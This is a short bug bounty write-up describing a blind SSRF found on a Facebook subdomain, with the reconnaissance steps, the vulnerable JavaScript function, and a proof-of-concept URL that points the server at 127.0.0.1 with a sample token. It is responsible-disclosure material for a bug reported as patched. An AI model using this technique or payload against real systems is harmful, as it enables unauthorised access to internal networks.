$10000 Facebook SSRF (Bug Bounty)

Subdomains enumeration + File bruteforcing + JS analysis = $10K Blind SSRF

This is a write-up about a SSRF vulnerability I found on Facebook.

The vulnerability could have allowed a malicious user to send internal requests to the Facebook corporate network.

1) Subdomains Enumeration

By doing some subdomains enumeration, I found the following subdomain: phishme.thefacebook.com

If you have read my previous write-up « Story of a weird vulnerability I found on Facebook » you know already how much I love these 403 errors.

2) Javascript File Bruteforcing

By using a customized wordlist and bruteforcing the following path: https://phishme.thefacebook.com/**.js

I found a hidden Home.js file (https://phishme.thefacebook.com/Home.js)

3) Code Review of Home.js

By analyzing the code of Home.js file, I found an interesting function « sendPhishRequest » that was using XMLHttpRequest to request data from some specific links.

By digging deeper into the code, I found that this function was used as following:

Util.sendPhishRequest(‘PhishGetItemData.ashx’, { itemId: itemId, ewsUrl: ewsUrl, token: token }

Exploitation:

After trying several random token formats, I was finally able to successfully exploit the bug to send internal requests.

Params:

itemId: 123
ewsUrl: http://127.0.0.1:PORT
token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

POC:

https://phishme.thefacebook.com/PhishGetItemData.ashx?itemId=123&ewsUrl=http://127.0.0.1:PORT/&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

The stack-traces helped to gather information about the internal requests sent.

Timeline:

August 7, 2020: Reported
August 11, 2020: Triaged
August 11, 2020: Patched
December 3, 2020: Resolved
December 3, 2020: $10000 Bounty awarded

Amine Aboud

Twitter: https://twitter.com/amineaboud

Entrepreneur & cyber security enthusiast doing bug bounty for fun.